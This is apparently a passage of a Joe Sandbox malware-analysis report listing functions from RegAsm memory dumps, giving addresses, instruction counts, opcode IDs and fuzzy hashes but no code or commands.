                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d59638d26af69265d66b5569a5ef56cf20886f0f300f6499a09eb9912097d78e
                                                                      • Instruction ID: 07e2141c9fd42ec3f23e67a84577d9b32c5ce83a1cc367bd1ad938dfdd4001a8
                                                                      • Opcode Fuzzy Hash: d59638d26af69265d66b5569a5ef56cf20886f0f300f6499a09eb9912097d78e
                                                                      • Instruction Fuzzy Hash: 3FE08671258355DFDB43F718F664B99BF62EB45614F000094F90287708CB309C41C795
                                                                      Function 068ACC38 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aad90a059eb3611a1ff358db5588d8131322288bb4b9afd2cb7789133c1c493a
                                                                      • Instruction ID: 735263bf6121e82b8d561b221ba1e1fb1e1a18b993c01c04c497ea77ccdf393c
                                                                      • Opcode Fuzzy Hash: aad90a059eb3611a1ff358db5588d8131322288bb4b9afd2cb7789133c1c493a
                                                                      • Instruction Fuzzy Hash: B0E08C322587559FCB02FF28F954699FBA2EB84750B008166E045DB729CB306C62CBC5
                                                                      Function 02F747A0 Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d44ce4b11d5e713ece0c7b291e999d78b2fca084df104faf31522ee6ba30531e
                                                                      • Instruction ID: 387a943a028b9bc11ed9b2284685abf3906892f26df136d4af2823c120fab6bf
                                                                      • Opcode Fuzzy Hash: d44ce4b11d5e713ece0c7b291e999d78b2fca084df104faf31522ee6ba30531e
                                                                      • Instruction Fuzzy Hash: F9D05EA2B6505007CB09125CB8657DF579BEBDA7E8F894426E105DB744CCA44C824391
                                                                      Function 02F79E30 Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4ac57d0151d8fe646f61efa8c4a0a9b798a47794f606050c04287a72c7c8e4f8
                                                                      • Instruction ID: ad0d78e6f3d1a53411a2db99856535f03d485f231ac0e942cb4350aca6ee1129
                                                                      • Opcode Fuzzy Hash: 4ac57d0151d8fe646f61efa8c4a0a9b798a47794f606050c04287a72c7c8e4f8
                                                                      • Instruction Fuzzy Hash: 93E0C2716116188BE712BB7CE52429E77A4EFC6289F02022AE205A7758DF74984187D2
                                                                      Function 068AAC80 Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 43e017baa15952abdeb0aff5defa14a08c615656a2bf53a1393d3166beab94ac
                                                                      • Instruction ID: ad5adcd6c1559ebc3eb903460ca05332de3bbd29938df79dfd7b05d5956beff5
                                                                      • Opcode Fuzzy Hash: 43e017baa15952abdeb0aff5defa14a08c615656a2bf53a1393d3166beab94ac
                                                                      • Instruction Fuzzy Hash: E1D05E3230412D5FCA05376DF8184BE7BABEAC5A62300002AE70BC3B40CE695D0687D6
                                                                      Function 02F7CFF9 Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ab1d5fb27a391c4be14346ca405f6f542c4d4068708650a3018d7fb7ae6a2ebf
                                                                      • Instruction ID: 49e7a0096aa1558f27103dc28344e3dc2e522e2328922776c318703da85c0242
                                                                      • Opcode Fuzzy Hash: ab1d5fb27a391c4be14346ca405f6f542c4d4068708650a3018d7fb7ae6a2ebf
                                                                      • Instruction Fuzzy Hash: C4D02B827402A18FD241533CAC51FCB26D15F41684F4A01FDD144DF747D908C84247D0
                                                                      Function 068AB510 Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bdc467b7abcd3a3b46b7cbc0131d59c0d7f849660863e8b62459b2f45996b58a
                                                                      • Instruction ID: 8ccac59ec08391b352bf502e6e06fe49105ce81a026d01a24c2e0d736d29e5e7
                                                                      • Opcode Fuzzy Hash: bdc467b7abcd3a3b46b7cbc0131d59c0d7f849660863e8b62459b2f45996b58a
                                                                      • Instruction Fuzzy Hash: 61E09A75D0020CEFCB40EFE5D9448DDBBB9EB48200F1082A6D905A3200EB305F55DF80
                                                                      Function 068AE280 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 334cc5bbb71175ef728290a34f637035e2892f198342f292846b0c1104b4ab37
                                                                      • Instruction ID: e9cf5d5cbc815b479a1d91767d6144f19e54811ca51d4051972e396d32f5b817
                                                                      • Opcode Fuzzy Hash: 334cc5bbb71175ef728290a34f637035e2892f198342f292846b0c1104b4ab37
                                                                      • Instruction Fuzzy Hash: 42E086305603158FDB48FA04FE1B648F7A3F749708F100058E8124B668C771196E8BC5
                                                                      Function 068AF8E2 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3029339f1bf92b8a02c2ecf54a79145164c3fe14df73cbef506434a6f20af8b4
                                                                      • Instruction ID: 62931ae32529b7f48b4c59713c0f469fd0af8eec27daa98e1ef0f13ad9a271f2
                                                                      • Opcode Fuzzy Hash: 3029339f1bf92b8a02c2ecf54a79145164c3fe14df73cbef506434a6f20af8b4
                                                                      • Instruction Fuzzy Hash: 7AD0A736704171B7C215A39C78045AA6A97DBC5669746011FF506C3244CD115C214395
                                                                      Function 068AE210 Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 60097fb93da4dcfe081b47ac8f87d81d3cbbdf11a2ffbf83d66b2f106440745d
                                                                      • Instruction ID: 151d1db0d4741e8a3bd9dd43443e2b75e68422754251668a54dcdd73f1b59a61
                                                                      • Opcode Fuzzy Hash: 60097fb93da4dcfe081b47ac8f87d81d3cbbdf11a2ffbf83d66b2f106440745d
                                                                      • Instruction Fuzzy Hash: 1BD017B2A0420CFFCB40EFA8EA0095DB7FAEB45205B2045A9A509E3210EA316E009B91
                                                                      Function 068AE8F8 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 526c7446617489c7dba7283f5861ebfb6ba2e52c37c61777b24c8ff7ed44b8e8
                                                                      • Instruction ID: 30ca2020fc66a3f935d172fc2c210fc958ad85e126b807e9871cf1bb0ff869a8
                                                                      • Opcode Fuzzy Hash: 526c7446617489c7dba7283f5861ebfb6ba2e52c37c61777b24c8ff7ed44b8e8
                                                                      • Instruction Fuzzy Hash: E8D05E39214248EFC701DF58D840D953BAABF48714F004098F5844B632C733E821DB65
                                                                      Function 02F75A5F Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4bc1e7b2dfb1c53a1a94119f1431427ea1eabefda124a6bffb1cd72473c798c
                                                                      • Instruction ID: 51dc061715d2955cdd1ac7c07857982a55705f75f9a052ce312e12a0e3bc85b6
                                                                      • Opcode Fuzzy Hash: b4bc1e7b2dfb1c53a1a94119f1431427ea1eabefda124a6bffb1cd72473c798c
                                                                      • Instruction Fuzzy Hash: C9D09E70D0431DCEEB19CFA9C4583ACB3B2FF84359FA0482AC409AB294DB759C4ACB51
                                                                      Function 02F7AD01 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b2a1e17b9c4b26173f50abf8bb6c2173dab5cca8ff7159ed69edc9e1459a66f9
                                                                      • Instruction ID: 441afc02ad93d2f52113b0e1cd482d6dd2bea8d420827deb91621fa2f6107754
                                                                      • Opcode Fuzzy Hash: b2a1e17b9c4b26173f50abf8bb6c2173dab5cca8ff7159ed69edc9e1459a66f9
                                                                      • Instruction Fuzzy Hash: D7D012A1B014014BD346C92C9520B467ED1FB84251F4A44A5A484DB70DD219F8D0C791
                                                                      Function 068ADFD1 Relevance: .0, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e09a137de5f744af3dd9751705b2f22fdd9072fb5e30d2dad1ba151411335a27
                                                                      • Instruction ID: d68a5f73c147f26ee02e382de7907f541bee870ba068c759ae47f296bedf663c
                                                                      • Opcode Fuzzy Hash: e09a137de5f744af3dd9751705b2f22fdd9072fb5e30d2dad1ba151411335a27
                                                                      • Instruction Fuzzy Hash: 95C09B7568F3805DD3065F75DC095417F155B57D1174444DFD1819E477D1610057CBB1
                                                                      Function 068A3721 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b8bb228382032b2a5cc5d7e58120820944bcc5f7ed6f1f26ea7372bd4896ba21
                                                                      • Instruction ID: 55b81de6acc50c5943e5798f331bcd55f6ccde567418133c6c301d3fcf68689a
                                                                      • Opcode Fuzzy Hash: b8bb228382032b2a5cc5d7e58120820944bcc5f7ed6f1f26ea7372bd4896ba21
                                                                      • Instruction Fuzzy Hash: A7C09B715413509FD70197607807F767D64EBD0B00F85415DFF924A042C7750434D7A5

                                                                      Non-executed Functions

                                                                      Function 068AED10 Relevance: 5.2, Strings: 4, Instructions: 242COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (_^q$(_^q$(_^q$(_^q
                                                                      • API String ID: 0-2697572114
                                                                      • Opcode ID: 47106e088ced887ab0b93895640e591fbd70deb6b48304108a2487b2a297b11f
                                                                      • Instruction ID: 161f2827d15e8036633658d8f1f05c6cfa57b4494ec7b4a44791cd93aee1ae04
                                                                      • Opcode Fuzzy Hash: 47106e088ced887ab0b93895640e591fbd70deb6b48304108a2487b2a297b11f
                                                                      • Instruction Fuzzy Hash: 4791BD75B043049FDB44AF78D81466E7BB2FF85340F2485AAED06DB381DA359D06CB92